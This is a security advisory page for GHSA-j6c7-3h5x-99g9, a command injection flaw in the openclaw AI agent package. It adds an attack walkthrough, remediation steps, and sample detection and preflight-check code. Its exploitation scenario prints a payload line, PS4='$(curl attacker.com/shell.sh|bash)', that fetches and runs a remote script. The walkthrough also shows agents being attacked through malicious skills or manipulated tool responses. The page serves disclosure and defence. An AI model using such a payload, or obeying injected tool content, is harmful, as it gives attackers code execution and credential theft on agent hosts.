GHSA-j6c7-3h5x-99g9: openclaw: OS command injection via shell env-argv bypass

GHSA-j6c7-3h5x-99g9 MEDIUM
Published April 17, 2026
CISO Take

The openclaw npm AI agent package (versions 2026.2.22–2026.4.11) contains an OS command injection flaw where shell environment variable assignments in argv form — including high-risk controls like SHELLOPTS and PS4 — bypass exec preflight sanitization, enabling arbitrary command execution within AI agent workflows. While rated medium severity with no CVSS vector assigned, this vulnerability carries elevated contextual risk in agentic AI deployments where openclaw orchestrates external tool calls and shell interactions; the same package carries 135 prior CVEs, signaling systemic security debt rather than an isolated lapse. No public exploits or active exploitation (CISA KEV) are confirmed, but AIID #1368 — where openclaw's skill ecosystem was weaponized to deliver the AMOS credential stealer — illustrates the real-world impact potential of compromised openclaw deployments. Upgrade immediately to openclaw 2026.4.12 or later; no workaround exists short of patching.

Sources: GitHub Advisory, ATLAS, CISA KEV

What is the risk?

Contextual risk exceeds the nominal medium rating. Shell environment variable injection via SHELLOPTS and PS4 in an AI agent runtime can enable arbitrary command execution that cascades across automated pipelines with minimal user interaction. The package's history of 135 CVEs signals persistent security deficiencies rather than an isolated bug. Blast radius is bounded — only 4 direct downstream dependents — but AI agent deployments frequently run with elevated privileges and broad filesystem access, significantly amplifying post-exploitation impact. No EPSS data or public exploits are available, moderating immediate urgency.

How does the attack unfold?

Initial Access (AML.T0010.005)
Attacker delivers malicious argv-level environment variable assignments (PS4, SHELLOPTS) via a crafted third-party skill, manipulated tool response, or direct input to an openclaw-based AI agent.

Defense Evasion (AML.T0107)
Vulnerable openclaw exec preflight fails to detect env-argv assignment injection forms, allowing SHELLOPTS or PS4 to pass undetected into the shell environment during tool invocation.

Execution (AML.T0050)
Shell spawned by the agent inherits the injected environment variables; PS4 debug prefix or SHELLOPTS manipulation triggers attacker-controlled commands in the agent's OS execution context.

Impact (AML.T0025)
Attacker achieves arbitrary code execution within the AI agent process, enabling credential theft, sensitive data exfiltration, or persistent backdoor installation on the agent host.

What systems are affected?

Package    Ecosystem   Vulnerable Range             Patched
OpenClaw   npm         >= 2026.2.22, < 2026.4.12    2026.4.12

4 dependents; 36% patched; ~3d to patch

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Moderate

What should I do?

  1. Upgrade openclaw to version 2026.4.12 or later (current stable: 2026.4.14 — already includes the fix).

  2. Audit all agent configurations for untrusted input paths that reach shell execution or tool invocation.

  3. Apply process isolation for AI agent workloads using containers or sandboxing to limit blast radius if exploitation occurs.

  4. Review any custom wrappers built on openclaw for shell environment variable handling.

  5. Monitor for anomalous shell process spawning — particularly processes with modified SHELLOPTS or non-standard PS4 values — originating from AI agent processes.

  6. Restrict openclaw agent OS permissions to least privilege; avoid running agents as root or with broad system access.
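Step 5 written out as detection logic, added here as an example and not part of the advisory or of openclaw: it scans constructed process-spawn events for children of an agent process whose environment enables xtrace through SHELLOPTS or carries a non-default PS4, or whose command line carries those assignments in argv form. The event field names and the agent process names are assumptions; map them onto your EDR or auditd schema.

```javascript
// Added example, not openclaw's code: detection for step 5 over process-spawn
// events, one JSON object per line. Field names (pid, parent, cmdline, env)
// and the agent process names are assumptions for this example.
const AGENT_PROCESSES = new Set(["openclaw", "node"]); // assumed parent names
const DEFAULT_PS4 = "+ ";                              // bash's default prompt
const CMD_SUBST = /\$\(|`|\$\{.*\}/;                   // expansion inside PS4
const ARGV_ASSIGN = /(^|\s)(SHELLOPTS|PS4)=/;          // assignment in argv form

// Returns the reasons an event is suspicious; an empty list means benign.
function reasonsFor(ev) {
  const reasons = [];
  if (!AGENT_PROCESSES.has(ev.parent)) return reasons; // only agent children
  const env = ev.env || {};
  if (typeof env.SHELLOPTS === "string" && env.SHELLOPTS.split(":").includes("xtrace")) {
    reasons.push("SHELLOPTS enables xtrace");
  }
  if (typeof env.PS4 === "string" && env.PS4 !== DEFAULT_PS4) {
    reasons.push(CMD_SUBST.test(env.PS4) ? "PS4 contains an expansion" : "PS4 is non-default");
  }
  if (ARGV_ASSIGN.test(ev.cmdline || "")) reasons.push("env assignment in argv form");
  return reasons;
}

// Walks JSON lines and collects the suspicious events with their reasons.
function scan(lines) {
  const hits = [];
  for (const line of lines) {
    let ev;
    try { ev = JSON.parse(line); } catch { continue; } // skip malformed lines
    const reasons = reasonsFor(ev);
    if (reasons.length) hits.push({ pid: ev.pid, cmdline: ev.cmdline, reasons });
  }
  return hits;
}

// Constructed sample events, not real telemetry.
const SAMPLE = [
  '{"pid":101,"parent":"openclaw","cmdline":"bash -c \\"ls -la\\"","env":{"PS4":"+ "}}',
  '{"pid":102,"parent":"openclaw","cmdline":"env SHELLOPTS=xtrace bash -c true","env":{"SHELLOPTS":"xtrace:braceexpand"}}',
  '{"pid":103,"parent":"sshd","cmdline":"bash","env":{"PS4":"$(date) "}}',
  '{"pid":104,"parent":"node","cmdline":"bash -c true","env":{"PS4":"$(id) "}}',
  'not json',
];
console.log(JSON.stringify(scan(SAMPLE), null, 2)); // flags pids 102 and 104
```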

How is it classified?

Which compliance frameworks are affected?

This advisory is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2 - AI system supply chain
NIST AI RMF: MAP 1.6 - Risks associated with third-party entities are documented
OWASP LLM Top 10: LLM05 - Supply Chain Vulnerabilities; LLM08 - Excessive Agency

Frequently Asked Questions

Is GHSA-j6c7-3h5x-99g9 actively exploited?

No confirmed active exploitation of GHSA-j6c7-3h5x-99g9 has been reported, but organizations should still patch proactively.

What systems are affected by GHSA-j6c7-3h5x-99g9?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent pipelines, tool orchestration systems, agentic AI deployments.

What is the CVSS score for GHSA-j6c7-3h5x-99g9?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworks, AI agent pipelines, tool orchestration systems, agentic AI deployments

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.005 AI Agent Tool
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2
NIST AI RMF: MAP 1.6
OWASP LLM Top 10: LLM05, LLM08

What are the technical details?

Original Advisory

## Summary

Shell-wrapper detection missed env-argv assignment injection forms.

## Affected Packages / Versions

- Package: `openclaw`
- Ecosystem: npm
- Affected versions: `>= 2026.2.22 < 2026.4.12`
- Patched versions: `>= 2026.4.12`

## Impact

Exec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls.

## Technical Details

The fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy.

## Fix

The issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.

## Fix Commit(s)

- `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab`
- PR: #65717

## Release Process Note

Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.

## Credits

Thanks to @decsecre583 for reporting this issue.
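The kind of check the fix describes, written out as an added example that is not openclaw's code and not the fix commit: a preflight that peels `env`-style and `sh -c`-style wrappers off an argv array and refuses any NAME=value assignment found in front of a command, marking SHELLOPTS and PS4 as high risk. The shell names, the wrapper names and the high-risk set are assumptions for the example; a real policy would be broader.

```javascript
// Added example, not openclaw's code: an exec preflight that rejects environment
// assignments carried in argv form, directly or through `env` / `sh -c` wrappers.
// The high-risk set and the shell/wrapper names are assumptions for the example.
const HIGH_RISK = new Set(["SHELLOPTS", "PS4"]);
const SHELLS = new Set(["sh", "bash", "dash", "zsh"]);
const ASSIGN = /^["']?([A-Za-z_][A-Za-z0-9_]*)=/; // NAME=value, possibly quoted
const SHORT_C = /^-[A-Za-z]*c[A-Za-z]*$/;         // -c, -lc, -xc ... (not --norc)
const base = (p) => p.split("/").pop();

function block(variable, where) {
  return { ok: false, variable, highRisk: HIGH_RISK.has(variable), where };
}
// Collect the NAME=value words that precede a command, skipping env/export
// prefixes and their flags. Stops at the first word that is not an assignment.
function leadingAssignments(words) {
  const names = []; let i = 0;
  for (; i < words.length; i++) {
    const w = words[i];
    if (w === "env" || w === "export" || w.startsWith("-")) continue;
    const m = ASSIGN.exec(w);
    if (!m) break;
    names.push(m[1]);
  }
  return { names, rest: words.slice(i) };
}
// A `-c` script: split into simple commands and check each one's prefix;
// recurse so that sh -c 'bash -c "..."' is unwrapped as well.
function scanScript(script) {
  for (const seg of script.split(/[;&|\n]+/)) {
    const words = seg.replace(/^[\s(){}!]+/, "").split(/\s+/).filter(Boolean);
    const { names, rest } = leadingAssignments(words);
    if (names.length) return block(names[0], "shell -c script");
    const nested = preflight(rest);
    if (!nested.ok) return nested;
  }
  return { ok: true };
}
// Entry point: argv exactly as the agent would hand it to child_process.spawn().
function preflight(argv) {
  const { names, rest } = leadingAssignments(argv);
  if (names.length) return block(names[0], "argv");
  if (!rest.length || !SHELLS.has(base(rest[0]))) return { ok: true };
  for (let i = 1; i < rest.length - 1; i++) {
    if (rest[i] === "--") break;
    if (SHORT_C.test(rest[i])) return scanScript(rest[i + 1]);
  }
  return { ok: true }; // shell without -c (script file or stdin) is out of scope here
}
```

Environment a tool genuinely needs should be passed through the spawn call's structured env option, which this check leaves alone, rather than inline in argv.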

Exploitation Scenario

An attacker targeting a production AI agent deployment running vulnerable openclaw crafts an input — via a malicious third-party skill, a manipulated tool response, or direct argv injection — embedding environment variable assignments such as PS4='$(curl attacker.com/shell.sh|bash)' or SHELLOPTS=xtrace. When openclaw's exec preflight processes the invocation, the missed detection for env-argv assignment forms allows these variables to pass into the shell environment. Upon shell spawning during tool execution, PS4 or SHELLOPTS triggers the injected command in the agent's security context, enabling reverse shell establishment, credential exfiltration, or lateral movement through systems accessible to the agent — mirroring the AMOS stealer delivery pattern documented in AIID #1368.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

Timeline

Published: April 17, 2026
Last Modified: April 17, 2026
First Seen: April 18, 2026
